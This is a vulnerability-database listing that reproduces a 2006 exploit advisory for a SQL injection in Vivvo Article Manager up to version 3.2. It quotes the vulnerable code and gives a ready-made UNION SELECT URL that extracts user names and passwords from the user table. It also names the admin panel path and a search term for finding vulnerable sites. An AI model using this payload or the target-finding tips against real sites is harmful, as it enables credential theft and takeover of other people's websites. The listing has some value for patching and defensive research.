Vivvo Article Manager <= 3.2 (id) Remote SQL Injection Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Vulnerability in phpWordPress Vivvo Article Manager v3.


                                                ############################################################
#MercilessTurk [email protected]
############################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: &#60;=3.2
############################################################
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET[&#39;id&#39;]);
#line 20: $query=&#34;SELECT * from tblArticles where id=$aid&#34;;
#secure_sql function doesn&#39;t block all sql injection attacks.
############################################################
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=[target_user_id]
############################################################
#Admin Panel:http://[target]/[path]/admin
############################################################
#For google searching:Vivvo Article Manager
############################################################
#Greetz: sanaldarbe.com members.
############################################################

# milw0rm.com [2006-09-09]

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1